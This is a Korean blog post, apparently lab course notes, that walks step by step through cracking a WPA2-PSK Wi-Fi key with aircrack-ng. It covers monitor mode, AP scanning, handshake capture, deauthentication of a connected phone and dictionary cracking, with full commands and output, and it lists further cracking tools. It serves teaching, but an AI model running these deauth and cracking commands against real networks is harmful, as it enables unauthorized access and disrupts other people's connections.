본문 바로가기

Learning/└◆Wireless Hacking

WPA2 Key Cracking

WPA2 키 크래킹

 


모니터 모드(관리모드 -> 모니터모드)로 전환

# iwconfig

 

wlan0     IEEE 802.11abgn  ESSID:off/any  

          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   

          Retry short limit:7   RTS thr:off   Fragment thr:off

          Encryption key:off

          Power Management:off

          

lo        no wireless extensions.


eth0      no wireless extensions.


eth1      no wireless extensions.

=> 카드이름 wlan0을 확인하자. moniter mode와 managed모드가 있다. managed모드는 AP에 붙히는 client가 사용하는 모드이다. 모니터링을 못한다. 그러므로 모니터 모드로 전환하자.

 

# airmon-ng

 

PHY Interface Driver Chipset


phy0 wlan0 rt2800usb Ralink Technology, Corp. RT5572

 

 

# airmon-ng start wlan0                            <= moniter모드로 전환

 

Found 2 processes that could cause trouble.

If airodump-ng, aireplay-ng or airtun-ng stops working after

a short period of time, you may want to kill (some of) them!

-e 

PID Name

3404 NetworkManager

3743 wpa_supplicant



Interface Chipset Driver


wlan0 Ralink RT2870/3070 rt2800usb - [phy0]

                                 (monitor mode enabled on mon0)

wlan0 물리적 카드이름 mon0은 모니터모드

 

# airmon-ng check kill (# kill 3404 3743)

 

Found 2 processes that could cause trouble.

If airodump-ng, aireplay-ng or airtun-ng stops working after

a short period of time, you may want to kill (some of) them!

-e

PID Name

3404 NetworkManager

3743 wpa_supplicant

Killing all those processes...

  

 

 

 

공격할 무선 AP를 검색

# airodump-ng mon0                      /* 패킷을 캡쳐     /* ng는 넥스트 제너레이션 차세대

 

 CH 13 ][ Elapsed: 16 s ][ 2014-09-12 08:41

                                           

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

                                                                                

 64:E5:99:43:65:33    0      176      172    0   3  54e  OPN              securityhacker4

 64:E5:99:43:65:32    0      157        0    0   3  54e  WEP  WEP         securityhacker3

 64:E5:99:43:65:31    0      179       27    0   3  54e  WPA  TKIP   PSK  securityhacker2

 64:E5:99:43:65:30    0      178      277    7   3  54e  WPA2 CCMP   PSK  securityhacker

                                                                                         

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

                                                                          

 64:E5:99:43:65:33  CC:F9:E8:06:88:88   -1    5e- 0      0      165

 64:E5:99:43:65:31  C0:65:99:EB:33:39    0   48e- 6      0       33

 64:E5:99:43:65:30  00:11:6B:63:41:A6    0   54 -54      0       48

 64:E5:99:43:65:30  64:E5:99:F2:C5:9D   -1   58e- 0      0       19

 64:E5:99:43:65:30  50:01:BB:F3:E8:5F   -1    5e- 0      0      209

 (not associated)   A0:78:BA:89:3B:90    0    0 - 1      0        2  iptime

 

-> 1분 정도 검색한 후 <CTRL + C>를 통해 끊는다.

-> 무선 APBSSID와 채널 번호를 기억해야 한다.

-> 만약 airodump-ng 명령어의 출력결과가 없는 경우에는 wlan0 NICup 되어 있는지 확인


# ifconfig

# ifconfig wlan0 up

# airodump-ng mon0

 

# airodump-ng -c 3 --bssid 64:E5:99:43:65:30 mon0

 

 CH  3 ][ Elapsed: 12 s ][ 2015-05-14 14:36 ][ fixed channel mon0: -1

     

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

                

 64:E5:99:43:65:30  -47   9       61        4    0   3  54e  WPA2 CCMP   PSK  securityhacker


 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 

 64:E5:99:43:65:30  08:3D:88:1E:79:FD  -47    0e- 6      0        9

-> 무선 AP에 접속한 사용자 검색

-> 08:3D:88:1E:79:FD 핸드폰의 MAC주소이기 때문에 외우고 있어야 한다.



연결된 스테이션을 DoS 공격을 통해 강제로 연결을 해제 후 재결합 과정을 거치게 한다.

[TERM2] 공격자 윈도우

(명령어 형식)

# airodump -c <채널번호> --bssid <BSSID> -w <저장할 파일> <Monitor Mode LAN Card>

 

# airodump-ng -c 3 --bssid 64:E5:99:43:65:30 -w /test/WPA2 mon0

 

 CH  3 ][ Elapsed: 24 s ][ 2015-05-14 14:48 ][ fixed channel mon0: -1 


 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID


 64:E5:99:43:65:30  -47  20      197       48    2   3  54e  WPA2 CCMP   PSK  securityhacker


 BSSID              STATION            PWR   Rate    Lost    Frames  Probe 


 64:E5:99:43:65:30  08:3D:88:1E:79:FD  -45    0e- 6      0       25  

 

 

이제 핸드폰을 무선 AP에 접속을 시킨다.(WIFI 기능을 OFF 했다가 다시 ON 한다.) 그리고 airodump 화면을 보면 왼쪽 상단에 "WPA handshake 메세지가 보인다."

 

 

[TERM3] 공격자 윈도우

(명령어 형식)

# aireplay-ng -0 <숫자> -a <무선 AP BSSID> -c <STATION MAC> <Monitor Mode LAN Card>

 

# aireplay-ng --ignore-negative-one -0 5 -a 64:E5:99:43:65:30 -c 08:3D:88:1E:79:FD mon0

                              /*   deauth  -a AP           -c moblie 

 

14:50:53 Waiting for beacon frame (BSSID: 64:E5:99:43:65:30) on channel -1

14:50:54 Sending 64 directed DeAuth. STMAC: [08:3D:88:1E:79:FD] [ 0|59 ACKs]

14:50:55 Sending 64 directed DeAuth. STMAC: [08:3D:88:1E:79:FD] [ 0|62 ACKs]

14:50:56 Sending 64 directed DeAuth. STMAC: [08:3D:88:1E:79:FD] [ 0|62 ACKs]

14:50:56 Sending 64 directed DeAuth. STMAC: [08:3D:88:1E:79:FD] [ 0|57 ACKs]

14:50:57 Sending 64 directed DeAuth. STMAC: [08:3D:88:1E:79:FD] [ 0|20 ACKs]

 

 

핸드폰에서 인증을 끊고 다시 연결해 본다.

 

WPA 키를 크랙한다.

[TERM3] 공격자 윈도우

# aircrack-ng -b 64:E5:99:43:65:30 -w /test/dictionary1.txt /test/WPA2-01.cap


No valid WPA handshakes found.. 가 뜨면 패킷을 다시 캡쳐해야 한다.

 

                                Aircrack-ng 1.2 beta3



                   [00:13:40] 2736496 keys tested (3456.23 k/s)



                           KEY FOUND! [ soldesk1. ]



      Master Key     : 31 D9 74 3F 5B 8C 21 B2 C4 34 DB 97 71 36 DC 08 

                       23 70 6D 61 67 83 31 79 03 71 C4 35 07 37 EE A3 


      Transient Key  : CD F4 8A BC 5A AE A1 B6 2C D0 E0 85 3A 05 FE DD 

                       B9 BA 61 ED 51 23 52 B8 31 22 91 DF CF AA 5B 61 

                       5F 22 C6 97 59 07 D5 44 A2 EA 5D 7D 95 DD 5C AA 

                       DE 7F FD D3 3D E3 EE 05 5E B3 1A 30 75 1F 26 09 


      EAPOL HMAC     : 35 9E 6A 4B E1 6C 48 A5 09 C2 17 6C 2A CB 7E 20 

 

-> 많은 시간이 걸린다.

-> 사전 파일을 생성하기 싫다면 아래와 같이 실행한다.

-> (참고) # crunch 9 9 soldesk1. | aircrack-ng 'WPA2-01.cap' -w - -e dlink

 



 

(절차정리) WPA2 방식의 암호 크래킹

USB 방식의 무선 랜카드 장착 (물리적으로 장착)

# airmon-ng start wlan0                      (wlan0 -> mon0)

# airodump-ng mon0                           (WPA 방식의 AP 검색)

# airodump-ng -c 3 --bssid 64:E5:99:43:65:30 -w packet mon0

                                              (WPA 방식의 패킷 캡쳐 & 저장 & 무선 AP 붙어있는 STATION 확인)

# aireplay-ng -0 5 -a 64:E5:99:43:65:30 -c 08:3D:88:1E:79:FD mon0

                                              (무선 AP 붙어 있는 STATIONdeauth 패킷 보내기)

# aircrack-ng -b 64:E5:99:43:65:30 -w dictionary1.txt packet-01.cap

                                              (사전파일 비교를 통해 WPA 암호 크래킹)

 

 

 

[실습] reaver를 통한 Brutus Attack

무선 크랙 도구: reaver(brutus Attack)

- 유튜브 동영상 참고

 

 

[실습] easy-creds : 종합 자동도구

bash 쉘 스크립트

- http://sourceforge.net/projects/easy-creds

무선AP를 검색해서 스테이션에 deauth를 보내서 암호를 새로 보내라고하고 암호를 알아낼 수 있다. 

 

 

[실습] 칼리리눅스

- Wireless Attack > 802.11 Wireless Tools

- () fern-wifi-cracker(유튜브 동영상 참고) 

 

'Learning > └◆Wireless Hacking' 카테고리의 다른 글

01. reaver를 통한 Brutus Attack  (0) 2017.02.14
Fake AP  (0) 2017.02.01
WPA Key Cracking  (0) 2017.02.01
WEP Password Cracking  (0) 2017.02.01